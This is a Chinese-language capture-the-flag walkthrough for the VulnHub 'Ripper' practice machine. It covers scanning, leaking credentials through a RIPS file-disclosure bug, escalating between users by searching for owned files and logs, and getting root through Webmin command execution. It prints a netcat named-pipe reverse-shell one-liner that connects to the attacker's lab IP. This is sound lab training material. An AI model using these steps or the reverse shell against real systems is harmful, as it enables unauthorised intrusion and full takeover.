VnlnHub Ripper

	靶场下载地址：https://download.vulnhub.com/ripper/Ripper.ova 打开后把网络模式设置为NAT模式（桥接模式也可以,和kali攻击机保持一致就可以） 开启虚拟机 靶场搭建完毕 渗透测试 由于不知道靶机ip，所以需要扫描NAT的网段 147为kali攻击机的ip，所以148为靶机ip 扫描靶机端口服务开放情况 开放了22端口，存在SSH服务 开放了80端口存在http服务，且中间件为Apache2.4.29 开放了10000端口，存在http服务，且中间件为MiniServ1.910(Webmin) 先访问一下80端口的WEB 为Apache初始页面 搜索一下敏感目录，使用了不同工具不同字典，但是没有发现其它敏感目录 所以我们先去看一下10000端口的WEB 让我们访问https://bogon:10000。，所以我们需要把这个域名添加到hosts文件中 访问发现是Webmin的后台登录页面 先尝试一下是否存在admin/admin/admin123这样的弱口令，发现不存在 搜索一下敏感目录 发现存在robots.txt，里面有一段base64编码 解码 提示说他们用rips扫描php代码 通过搜索知道它是一个PHP源代码审计工具RIPS 并且使用rips，可能会存在rips路径 尝试访问，发现没有 猜测可能是在80端口上，尝试访问，发现果然再80端口上 这是一个代码审计，找是否存在漏洞的自动化工具，所以我们再WEB的根目录（/var/www）扫描 并且勾选扫描子目录选项，进行扫描 扫描成功，查看结果 查找看是否存在可以利用的漏洞，发现存在文件泄露并且存在file参数 尝试利用，发现可以读网站根路径下的文件，但是不能读取web路径以外的路径 发现这个漏洞只能用于读取文件，不会进行解析 所以我们只能尝试去读取一些敏感信息 这个代码审计工具有搜索的功能，尝试看能不能搜索到关于账号密码的信息 搜索发现了一组用户名和密码 ssh服务是开启的，尝试登录，发现登录成功 获得到第一个flag 还发现一个可疑文件，但是为空，好像是让我们sudo提权为admin 但是发现没有sudo命令 在/home目录下发现还存在一个叫做cubes的用户，我们可能需要先提权到这个用户 使用其它方式提权 需要提权到cubes用户，所以我们现在找cubes权限的文件，并且可以被ripper读的文件 通过命令 find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件 发现secret.file文件，查看文件 发现一段密码，猜测是cubes用户的密码，尝试登录，登录成功 尝试再次提权到root，sudo提权、suid提权、内核提权都不行 在尝试通过同样的方法在找找有什么其它特殊文件 发现有很多没用的目录和文件，经过过滤得到结果 find / -user cubes -type f -exec  ls -al {}  \; 2>/dev/null |  grep -v '.png' | grep -v '/proc' | grep -v '/sys' 发现一个miniser.log日志文件 在其中发现一对账号密码 猜测是登录webmin后台的，因为在webmin目录下 尝试登陆，登录成功 在左下角发现可以直接执行命令 发现权限为root 利用这个命令执行再反弹一个shell 先监听端口，然后执行命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f 获得第二个flag 此版本的webmin也存在rce漏洞，但是也需要账号密码，登陆后也可以通过漏洞来获得shell。